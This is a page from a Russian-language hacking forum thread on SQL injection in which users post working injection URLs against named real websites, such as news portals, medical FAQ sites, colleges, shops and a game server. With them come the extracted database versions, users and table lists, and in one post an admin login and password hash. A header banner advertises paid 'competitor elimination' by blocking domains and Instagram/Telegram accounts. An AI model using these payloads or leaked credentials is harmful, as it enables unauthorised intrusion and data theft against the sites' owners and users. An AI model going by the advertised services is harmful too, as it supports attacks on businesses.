УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 901 из 1242

901

Опции темы

Поиск в этой теме

Опции просмотра

#9001

25.04.2009, 15:18

Rav1n

Познающий

Регистрация: 05.11.2008

Сообщений: 92

Провел на форуме:
1562063

Репутация: 149

http://www.itscoldoutside.com/

Код:

http://www.itscoldoutside.com/news.asp?id=1+or+1=(select+top+1+id+from+dtproperties)--

version: Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name: ICONews
system_user: Clive

вот что удалось раскрутить:

Код:

table_name			column_name

VW_test
dtproperties	'id'	'objectid'	'property'	'value'	'uvalue'	'lvalue'	'version'
NewsArticles
sysconstraints	'constid'	'id'	'colid'	'spare1'	'status'	'actions'	'error'
syssegments	'segment'		'name'	'status'
t_jiaozhu		'jiaozhu'
tbl_news
vw_bcpMasterSysobjects	'tag'	'parent'	'Article!1!ID'	'Article!1!BradftonID'	'Article!1! Heading'		'Article!1! DateFeed'
vw_googlenews 
VW_rss
VW_top
VW_xml

p.s. первый раз

#9002

25.04.2009, 15:20

BlackPanther

Новичок

Регистрация: 19.04.2009

Сообщений: 15

Провел на форуме:
139497

Репутация: 10

Site: (sibmedia.ru) Новостной портал.
SQL:

Код:

http://sibmedia.ru/index.php?id=-10220+union+select+CONCAT_WS(CHAR(32,58,32%20%20),user(),database(),%20version()),null,2--

Рузелтат смотреть вверху.
Таблицы :

Код:

[*]CHARACTER_SETS[*]COLLATION[*]COLLATION_CHARACTER_SET_APPLOCABILITY[*]COLUMNS[*]COLUMS_PRIVILEGES[*]KEY_COLUMN_USAGE[*]PROFILING[*]ROUTINES[*]CHEMATA[*]CHEMA_PRIVILEGES[*]STATISTICS[*]TABLES[*]TABLE_CONSTRAINTS[*]TABLE_PRIVILEGES[*]TRIGGERS[*]USER_PRIVILEGES[*]VIEWS[*]all_news[*]areas[*]static[*]vote

#9003

25.04.2009, 15:59

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Код:

http://www.ckat.ru/keywords/answer.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version())/*

Uwww63S@localhost:udb63:4.1.21-log

Код:

http://www.venereology.ru/faq/answer.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9

mgido@localhost:mgido:5.0.45

Код:

http://www.infomedical.ru/faq/answer.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9

infomedical@localhost:infomedical:5.0.45

Последний раз редактировалось mailbrush; 25.04.2009 в 16:16..

#9004

25.04.2009, 19:47

M.W.N.N.

Участник форума

Регистрация: 05.01.2009

Сообщений: 191

Провел на форуме:
3020589

Репутация: 240

Код:

http://www.beadstreet.com.au/listproducts.php?id=47+union+select+concat_ws(0x3a,version(),database(),user())+limit+1,1

version():4.1.20
database():beadstreet
user():beadstre@localhost
__

Код:

http://www.bpsca.co.uk/products.php?id=147+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11+limit+1,1/*

version():4.1.22-standard:
database():bpsca_data
user():bpsca_website@localhost
__

Код:

http://www.etver.ru/1forum/viewmessage.php?sid=1&id=29140+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9

version():5.0.77-log
database():etver
user():etver@localhost

Последний раз редактировалось M.W.N.N.; 26.04.2009 в 01:41..

#9005

26.04.2009, 12:21

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Отправить сообщение для DezMond™ с помощью ICQ

http://vikings.vcsu.edu/php/details.php?id=-563'+union+select+1,2,table_name,4,table_name,6,7, 8,9,10,11,12,13,14,15+from+information_schema.tabl es+limit+879,1000+--+

Все таблицы заблокированны((

#9006

26.04.2009, 13:54

L I G A

Постоянный

Регистрация: 27.07.2008

Сообщений: 614

Провел на форуме:
4532332

Репутация: 1196

Отправить сообщение для L I G A с помощью ICQ

cinema.perm.ru

Код:

http://cinema.perm.ru/events/?id=-67+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--

version():4.0.24_Debian-10sarge2-log
database():dbcinema
user():cinema@localhost

#9007

26.04.2009, 15:16

~~farex~~

Banned

Регистрация: 11.03.2009

Сообщений: 214

Провел на форуме:
914766

Репутация: 317

<<RUNAWAYBOX>>

Код:

http://www.runawaybox.com/video.php?vid=-396+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9--+

Код:

http://www.runawaybox.com/admin/

5.0.45:runawaybox:runawaybox@localhost

ortbld-freebsd6.2
-=admin=-
log: runawaybox
pass: $1$0lRFi.9p$5vaDEIDcwC/b/aQu/H1.g1 ):

#9008

26.04.2009, 16:02

S00pY

Познающий

Регистрация: 24.04.2007

Сообщений: 92

Провел на форуме:
2621544

Репутация: 412

Отправить сообщение для S00pY с помощью ICQ

online game

Цитата:

http://info.wotgame.ru

thx for Saint
mssql-inj поле логина,результат в урл

Цитата:

Таблы:
wqe' or 1=(select top 1 TABLE_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME NOT IN('UserRecords','Objects','InheritanceMapping','U serRecordParts','CharacterRecordParts','TypesMappi ng','CharacterRecords','UserRecordsToUserRecordPar ts','UserRecordsToCharacterRecords','CharacterReco rdsToCharacterRecordParts','JabberUserRecords','WO TCharacterRecordStubs'))--

================================================== ==================================

Цитата:

http://www.585.ru/index.php?main=11&sess=12103026&model=3446+and+sub string(@@version,1,1)=4

version():4 ;(
================================================== ==================================

Цитата:

http://eromagazin.ru/info/?id=-6300+union+select+1,2,3,4,5,6,7,8,9,table_name,11, 12,13+from+information_schema.tables--

concat_ws(0x3a,version(),user(),database()):5.0.67-log:u30200@10.10.153.166:u30200

#9009

26.04.2009, 16:31

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

http://www.jc.edu/calendar/details.php?id=-4265+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11 +from+information_schema.tables/*

Последний раз редактировалось jokester; 26.04.2009 в 18:15..

#9010

26.04.2009, 16:44

Rav1n

Познающий

Регистрация: 05.11.2008

Сообщений: 92

Провел на форуме:
1562063

Репутация: 149

Код:

http://www.raznosvet.com/do/notice.php?id=-7590+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10--

version: 4.0.27-max-log
database: razno
user: razno@208.109.138.83

еще похекал сайт тур фирмы(mssql), пока выкладывать не буду

Последний раз редактировалось Rav1n; 26.04.2009 в 17:26..

Страница 901 из 1242

901

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход